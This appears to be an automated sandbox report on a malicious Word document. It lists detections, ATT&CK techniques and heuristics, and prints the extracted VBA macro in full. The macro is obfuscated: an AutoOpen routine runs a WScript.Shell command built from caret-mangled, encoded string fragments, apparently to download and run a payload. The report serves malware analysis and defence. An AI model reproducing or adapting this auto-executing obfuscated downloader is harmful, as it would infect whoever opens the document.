MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a VBA macro that utilizes WScript.Shell and CreateObject, indicating an attempt to execute arbitrary code. The macro's function `anPSGv` appears to construct a command string, likely for downloading and executing a secondary payload. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further support its malicious nature.
Heuristics 10
-
ClamAV: Doc.Malware.Valyria-6691545-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6691545-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
On Error Resume Next jtmGLN = CreateObject("WScript.Shell").Run(ChrW(3 + 4 + 12 + 7 + 41) + QAkOikvTmvT + MtTOpAX + anPSGv + pXWiwfIdwsc + BROtcSrK + SZTQTKpTCAd + jWoMkY + QWwtSLkUBC + lzLGhrvZjbCHm + kKHUuwH, 629956369 - 629956369) End Sub -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
On Error Resume Next jtmGLN = CreateObject("WScript.Shell").Run(ChrW(3 + 4 + 12 + 7 + 41) + QAkOikvTmvT + MtTOpAX + anPSGv + pXWiwfIdwsc + BROtcSrK + SZTQTKpTCAd + jWoMkY + QWwtSLkUBC + lzLGhrvZjbCHm + kKHUuwH, 629956369 - 629956369) End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9826 bytes |
SHA-256: 6ec61a1344e43d6c84b527180dfdf5edea89ae77b51df508a864d338bb5b89d3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
99 of 154 identifiers look randomly generated (e.g. 'sGrLOCqUmvcwGM'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zdaaVfsaffO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aMAmkvSdMMujQ"
Function anPSGv()
On Error Resume Next
Error Hex(GFiCCj)
DCSmZVYFY = "MD /v:^" + " ^ " + "^ /c" + " " + CStr(Chr(sGrLOCqUmvcwGM + KWrQMaAIT + 34 + EjWiwQjDKdazk + tXjNZLDsPXuIh)) + " ^Se^T" + " ^ ^ " + "^" + "kL==" + "=^AAg" + "A^A^IA^"
Error Sin(96743 - 76100 - 18460 + ldKmz)
Error CByte(186609479)
Error Sqr(tIJaXW)
csLOnKCs = "AC^Ag^" + "A^A^IA" + "^ACAgA^" + "A" + "IA^" + "AC^"
Error Rnd(442)
rlGMiOr = "A^" + "g^A^AI^" + "AAC^A" + "g^A^" + "A^I" + "^A^AC^" + "AgAA" + "I" + "^A0HA^9" + "Bwe^" + "A^g" + "^G^" + "A^jB^"
Error Str(65009 + TDWTX)
Error CDate(jcIQw)
Error Atn(3)
Error Oct(ZkvGu)
Error CVar(42916114)
KtbDorz = "A" + "dAEGAj^" + "B^Q" + "f^A" + "^" + "sDA" + "r^BQY^A" + "^UGA^yB" + "g^Y^As^" + "DAmBg" + "RA^E" + "^H" + "Ak^"
Error Rnd(iKjiMS)
Error Sin(56533 / ppiHq)
PpzLWHrIBjI = "A^A^I" + "A^0" + "^" + "GAlB^A^" + "d" + "^A^" + "k^EAt" + "A^Q^Z" + "^A^s^G" + "AvB^" + "gd^A4G" + "A^JB^wO" + "A^kC"
Error Round(301)
bASJurhML = "^A" + "^m^BgR^" + "A^EHA^" + "k^AA^" + "I^" + "A^wC" + "^AW^Bg" + "T^AQ^G" + "^AkAA" + "^KAU^G^"
Error Fix(AJZiXu)
Error CDec(8708)
kLwTCtzKEBn = "AsB" + "Q^a" + "A^Y^EA" + "^k^BQ" + "Y^A^" + "8GAs" + "Bg^"
anPSGv = DCSmZVYFY + csLOnKCs + rlGMiOr + KtbDorz + PpzLWHrIBjI + bASJurhML + kLwTCtzKEBn
Error TimeValue(97667 / 15749 + 32668 - 96266)
Error CStr(28498 / bIhapM)
Error TimeValue(8)
End Function
Function pXWiwfIdwsc()
On Error Resume Next
Error CDbl(68)
IODil = "bAc" + "H" + "^Av" + "BARA^4C" + "^" + "A" + "^" + "H^B^QSA" + "^MH"
Error Fix(HRMYO)
Error CDbl(327000462)
Error Log(35282 / jBtcAp + 91280 / 40690)
Error Int(hAjBC)
jJidPini = "A" + "^k^A^" + "w^eAkH^" + "A^y" + "BAdA" + "s^H^A" + "p^Aw" + "^T^A^" + "IE" + "^AmB^AJ" + "^" + "AAC"
Error Int(431794797)
Error Hex(16)
Error Log(3509)
UXUwQfEo = "A^u^" + "B" + "Qa^A" + "^AC^" + "A" + "WB^" + "gTA^Q" + "^GAkA" + "^A^"
Error Hex(siTbK - qEZQrv)
Error Str(30689 * FcMYNt)
Error CVar(436)
LuLopwAXB = "K^AgG" + "^" + "Aj" + "^BQ^" + "Y^"
Error CDbl(85381 - 59393 / rUHHZ * VZCpA)
qZOCs = "A^U^G" + "AyBw" + "^bAY^" + "G^" + "A7^A^w"
Error Tan(3)
Error Tan(PYHCh)
Error CCur(SoIEH - HnqTt)
CaAWhn = "^JAUGA" + "4BQ^Z" + "A4CAn^A" + "^w^" + "K" + "As^E^AM" + "^B" + "^Ac^" + "A^QCAr" + "A^wJ^Aw" + "^" + "FAn" + "^A^w^"
Error CVar(jKEaj)
Error Tan(AlEzFk - AEYPSj)
hFVfzwnRatq = "KA^M" + "GA^pB^A" + "^bA^IG^" + "A" + "1^BAcA" + "oD^" + "A2Bg^bA"
Error Log(7)
Error Cos(VOBROz)
WCWiZC = "^UG^A^" + "kA^Q" + "^PA" + "^Y^GA^G" + "BQc" + "^AQC" + "A7^AwJ" + "^A^Y^D^" + "A^" + "1^A^wNA"
Error CDec(82)
Error Cos(dHIpi)
Error Sqr(313)
Error CDate(45231 + 71605 * WzjVw * Skjoo)
tdfktpHCjNY = "cCAg^AQ" + "^" + "P" + "^A" + "^AC" + "AL^BAT" + "^A^A" + "^H^A^" + "k^Aw" + "^OA^k"
Error CStr(JsjNA)
Error TimeValue(52572 - dLjjOj * 49909 / FlrXR)
Error Val(jETaAX / UvuWn)
VtaakSBSkAP = "C^AnA^A" + "Q^AcCA" + "oA^AdA" + "^k^GA" + "^s^" + "BA" + "c^AM" + "^FA^uA"
Error Month(20)
Error TimeValue(930)
JqlVWL = "^w^J" + "AA^" + "HAO^B" + "^g^eA^" + "I^" + "D^" + "A" + "Y^B" + "^ga" + "AgE^AvA"
pXWiwfIdwsc = IODil + jJidPini + UXUwQfEo + LuLopwAXB + qZOCs + CaAWhn + hFVfzwnRatq + WCWiZC + tdfktpHCjNY + VtaakSBSkAP + JqlVWL
Error CStr(12316 + KswYD)
Error Log(ttppV)
Error Fix(9)
End Function
Function BROtcSrK()
On Error Resume Next
Error Fix(44745 * LjSQvW * 81649 / RsQvL)
Error CByte(YbSAP)
Error CCur(25580 + JzACsl)
GBkwbsss = "Q" + "b^A^" + "8^" + "G^A" + "^j^" + "BgLAM^H" + "Ay^B^QZ" + "A^Q^GA^" + "h^B" + "gc^A"
Error Str(899)
Error Sgn(7636)
VPVwsqcCz = "^" + "QH" + "A^l" + "^B^" + "Q^e" + "^A^UG" + "A" + "r^B^wdA" + "^EGAo"
Error Str(GnAuZZ * rcZwtm - plAVi / OkujJK)
Error LCase(312)
Error Log(MRRAH)
bMhHzKH = "BgLAc" + "H^A^l" + "B" + "gb^A^8C" + "^Av^A^g" + "^O^" + "AA^HA0B" + "A^" + "d^" + "A^gG^A" + "^AB^ga"
Error Str(GJakX)
Error Hex(508)
Error CDbl(3)
ENJYrJci = "^" + "A" + "^M^" + "H^A^6" + "^B^A^" + "d^A^AF^" + "AvA" + "^Qb^"
Error Sqr(87014 + WsQlOO + zzNqjL / SUCdM)
Error Sqr(83558 * kSNwT + 24622 - DbjAm)
mtiHWw = "A^8G" + "A^jB^gL" + "^A^g^G" + "^Aj" + "^Bg^b^A" + "E" + "GAyB^" + "gcA"
Error Log(vQwpH * NiYdQ + NiBMdH * VQkddJ)
Error Int(LwJQl)
Error Val(66275621)
Error CVar(zAoZHq)
Error Hex(pMTTL)
tqmhJmul = "^" + "UGA" + "r^B" + "^w^Y" + "AE" + "^" + "G^AoB" + "^w^L^A"
Error Sin(318921671)
ZJwKHmU = "^8" + "CA6^A^A" + "c^AQ" + "^H" + "A0B^A^a" + "A^A" + "E^A^j" + "BQ^WAo" + "H^" + "A^YBQ" + "UA8" + "C"
BROtcSrK = GBkwbsss + VPVwsqcCz + bMhHzKH + ENJYrJci + mtiHWw + tqmhJmul + ZJwKHmU
Error Fix(36595 / FKmTfd)
Error Atn(fPNfG * hAYDA * lzvQJq * VsJIL)
Error Atn(377094896)
End Function
Function SZTQTKpTCAd()
On Error Resume Next
Error Log(490405347)
Error Round(139478161)
fObbPFPrllh = "^At^Bw" + "bA^M^" + "G^AuAg" + "^bA8" + "^G" + "^ApB" + "AdAM" + "G^Al^" + "BgdA^4" + "G^A" + "v^"
Error CDec(414307431)
Error LCase(4171)
Error Hex(186)
Error Atn(699)
TzjiVVDZZSW = "Bw^Y^A" + "EG^" + "A^q^BwZ" + "A^8^GA^" + "qBwLA8C" + "A6^A^A" + "c^" + "AQH^A" + "^" + "0B^" + "AaA^A"
Error Log(znNzGS - 32172 - EUoIPV - 18683)
Error CCur(9026)
kPWftPRwjK = "^E^A" + "^5B^QQ" + "^A^" + "oG" + "A^U^B" + "Q" + "Q^A" + "g"
Error Hex(WGCNu)
Error Second(70)
Error Hex(DJVCEK)
hiimb = "GA" + "vA^" + "QbA8GA" + "j^Bg" + "^LAA"
Error Sqr(1535)
Error Log(VOatLH - 94918 / lXrLE * VYQTz)
Error Tan(cMiNn)
Error Int(kzuEn / oLjdu / PXiXvr / ChjtA)
BthSJqFoJ = "^H^" + "A1B^" + "w^b^A^I" + "H^A" + "nB^w^" + "Y^Ak" + "G"
Error Round(88773 * jWijkE + 7991 * 87610)
Error CDate(tCvfY / fmncn)
Error Cos(327)
Error CVar(JpnZCK)
Error Rnd(DvJnzV)
XHVPCpNiXT = "A^zB^Q^" + "dA0^G^A" + "l^B^w" + "cAI^H" + "^A^l^B"
Error Sgn(uuITMW)
Error Val(bSkNw - 25626)
Error Cos(25)
SVrujvIv = "^" + "g^dA" + "^U^G^" + "A^yB^wL" + "A^8C^A^" + "6AAcAQ^" + "H^" + "A^0^BA" + "^a"
SZTQTKpTCAd = fObbPFPrllh + TzjiVVDZZSW + kPWftPRwjK + hiimb + BthSJqFoJ + XHVPCpNiXT + SVrujvIv
Error Second(54)
Error CVar(vhjjDf - kzBqDf + JzuaCV * LNwSR)
End Function
Function jWoMkY()
On Error Resume Next
Error CDbl(778)
Error Oct(93340 * oiioDL)
KGjZM = "A" + "^AEAO^B" + "g" + "b" + "AcF^AVB" + "^QV"
Error Month(XmZpPX)
Error CDbl(JvEjZu / RYzWP + wkZzL + RuXLzz)
Error CVar(11727 + iUNzWm - 45262 / ufzlwd)
Error LCase(20142 - zTlHV - kUlRlX / nCaCYB)
wsLhUHpqUO = "^A^" + "8C^AtB" + "wb" + "AM^G^Au" + "A" + "gc^A^U" + "G^A"
Error CBool(ZNqZk - PGjWO)
Error LCase(91465 / YnlsYm + 72786 * HmXXOr)
Error Second(vZXPH)
mqOYza = "0B^g" + "b^A" + "UG^AjBA" + "^bA^EGA" + "0B^g^b^" + "AUGA" + "^k^" + "BQ^ZA" + "wGAs^" + "B" + "^Qa^A" + "Y^H"
Error Hex(frjdsb * zQwwni + jbJBaF + MidWZk)
Error CByte(6677)
Error LCase(258941932)
Error Rnd(lDOPS)
SPwSPWmwij = "Au^B" + "^QZA" + "wGAn^B" + "^Q" + "^YA" + "^k^" + "GA^0B" + "wb^AM^" + "G^A" + "^z^" + "Bw^L^" + "A^8CA6"
Error CDbl(876)
Error Round(9511 / kCPSJF / 13087 + qFhiv)
Error CByte(3)
Error CDate(23758 / 78955 + 90414 + nnvYw)
Error Month(PMCOr)
DzBBhW = "AA" + "c^A^Q^" + "H^" + "A0B^A" + "a" + "^AcCA9" + "^AwTA" + "IE^Am" + "BAJA^sD" + "A^0Bg" + "b" + "A^" + "U^G^A^p"
Error Second(31089 / EvqaAn)
Error Cos(jMiMC)
NuwXPRBNnuf = "B^Ab^AM" + "^" + "E^A^i" + "^B^Q" + "^ZAc" + "^F^A" + "u^A^A^d" + "^A^U" + "^G^A^" + "OBA" + "^I^A^QH" + "A^jB^"
Error Tan(LLWjN / 55764 + CXJkoh - UWmdO)
Error CDate(rjYbC)
Error TimeValue(GLMChI)
Error CByte(fTCFO)
Error Hex(qDKlT / IZZvGq + 60140 / TdzfJw)
lBrSEYjNjwd = "Q^ZAo" + "^GAi^B" + "wbA^0" + "C^A" + "3" + "B"
jWoMkY = KGjZM + wsLhUHpqUO + mqOYza + SPwSPWmwij + DzBBhW + NuwXPRBNnuf + lBrSEYjNjwd
Error Log(HZjJiG)
End Function
Function QWwtSLkUBC()
On Error Resume Next
Error Round(21824 * ccwvci - 80147 / lmHbRB)
Error Atn(860)
Error Log(331)
vRsBizi = "^Q" + "Z^A4^G" + "^A" + "^9^AwR" + "^" + "A^k" + "^EA^z" + "B^AJ^" + " ^e^- ^" + "l^le" + "^h^sre^" + "w^o"
Error Rnd(trquWD - 23824 - 75718 / iTUIvO)
pEpfOAOwucB = "^p& " + "^F^" + "oR " + "/^" + "l "
Error Atn(0)
Error CByte(634)
Error TimeValue(250)
Error CByte(AUwbJ + 50189)
cTaFuifzLjd = "%^3" + " ^in (" + "^10" + "^29 ^" + ",^ -" + "^1, ^" + " ^" + "0) " + "^dO " + " ^"
Error Sin(GCfqSk + icrQqG - 38613 + SwfCw)
TiIOGwDOW = "s" + "^E^T" + " ^F^" + "Q" + "n=" + "!^F^Qn!" + "!^kL" + ":~ %^3,"
Error CCur(62)
Error CStr(CvYsP)
Error Rnd(92503 / FItYR * RciQjt * GJOiJr)
Error Tan(185 / fmDhc - trWwjT / iMwAc)
oXzfT = " " + " 1!& ^" + "I^" + "F %^3 " + " "
Error Tan(66924 + JdwlK / 27811 - sUXAc)
ZLYYIhTqsFC = "=^= ^" + "0 C^a^l" + "^L %" + "^F^" + "Qn:^" + "~^ " + "^ ^"
Error Tan(MXjmti + XvbBi * 17321 - uzfzO)
Error CByte(jIidQ)
iQTnXPrNz = " 5% " + " " + " " + CStr(Chr(jstKmkQQ + XJXkjYHzXjc + 34 + vjArHHD + lDuiEZi)) + " "
QWwtSLkUBC = vRsBizi + pEpfOAOwucB + cTaFuifzLjd + TiIOGwDOW + oXzfT + ZLYYIhTqsFC + iQTnXPrNz
Error Rnd(KFFbRQ)
Error Atn(6973)
Error Log(ppwGBK)
End Function
Attribute VB_Name = "NZFfqwbXSciAP"
Sub AutoOpen()
On Error Resume Next
jtmGLN = CreateObject("WScript.Shell").Run(ChrW(3 + 4 + 12 + 7 + 41) + QAkOikvTmvT + MtTOpAX + anPSGv + pXWiwfIdwsc + BROtcSrK + SZTQTKpTCAd + jWoMkY + QWwtSLkUBC + lzLGhrvZjbCHm + kKHUuwH, 629956369 - 629956369)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.